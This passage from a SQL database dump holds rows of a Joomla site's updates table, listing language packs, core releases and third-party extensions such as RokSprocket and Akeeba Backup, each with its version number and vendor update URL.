_details.xml','',''),(14809,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(14810,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(14811,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(14812,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(14813,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(14814,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(14815,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(14816,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(14817,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(14818,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(14819,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(14820,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(14821,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(14822,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(14823,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(14824,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(14825,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(14826,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(14827,3,0,'English US','','pkg_en-US','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(14828,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(14829,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(14830,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(14831,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(14832,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(14833,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(14834,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(14835,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(14836,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(14837,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(14838,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(14839,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(14840,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(14841,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(14842,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(14843,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(14844,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(14845,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(14846,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(14847,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(14848,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(14849,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(14850,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(14851,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14852,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(14853,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(14854,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(14855,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(14856,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(14857,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(14858,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(14859,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(14860,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(14861,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(14862,57,0,'French','','pkg_fr-FR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(14863,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(14864,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(14865,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(14866,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(14867,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(14868,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(14869,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(14870,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(14871,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(14872,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(14873,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(14874,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(14875,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(14876,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(14877,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(14878,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(14879,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(14880,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(14881,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(14882,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(14883,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(14884,57,0,'English US','','pkg_en-US','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(14885,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(14886,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(14887,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(14888,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(14889,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(14890,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(14891,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(14892,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(14893,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(14894,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(14895,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(14896,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(14897,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(14898,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(14899,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(14900,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(14901,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(14902,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(14903,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(14904,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(14905,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(14906,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(14907,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(14908,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-3.html\n				',''),(14909,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.11','','http://cdn.akeebabackup.com/updates/fef.xml','\n					https://www.akeebabackup.com/download/fef/1-0-11.html\n				',''),(14910,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(14911,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.3','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n					https://www.akeebabackup.com/download/fof3/3-5-3.html\n				',''),(14912,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14913,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14914,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14915,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14916,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-3.html\n				',''),(14917,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14918,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14919,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14920,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(14921,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(14922,3,0,'French','','pkg_fr-FR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(14923,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(14924,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(14925,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(14926,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(14927,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(14928,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(14929,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(14930,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(14931,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(14932,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(14933,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(14934,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(14935,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(14936,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(14937,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(14938,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(14939,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(14940,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(14941,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(14942,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(14943,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(14944,3,0,'English US','','pkg_en-US','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(14945,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(14946,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(14947,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(14949,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(14950,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(14951,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(14952,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(14953,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(14954,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','','');
INSERT INTO `fw3gt_updates` VALUES (14955,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(14956,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(14957,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(14958,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(14959,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(14960,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(14961,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(14962,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(14963,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(14964,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(14965,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(14966,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(14967,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(14968,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(14969,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(14970,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(14971,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(14972,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(14973,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(14974,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(14975,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(14976,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(14977,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(14978,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(14979,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(14980,57,0,'French','','pkg_fr-FR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(14981,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(14982,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(14983,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(14984,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(14985,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(14986,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(14987,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(14988,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(14989,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(14990,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(14991,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(14992,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(14993,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(14994,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(14995,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(14996,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(14997,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(14998,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(14999,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(15000,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(15001,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(15002,57,0,'English US','','pkg_en-US','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(15003,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(15004,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(15005,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(15006,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(15007,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(15008,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(15009,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(15010,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(15011,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(15012,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(15013,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(15014,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(15015,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(15016,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(15017,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(15018,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(15019,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(15020,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(15021,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(15022,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(15023,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(15024,57,0,'English 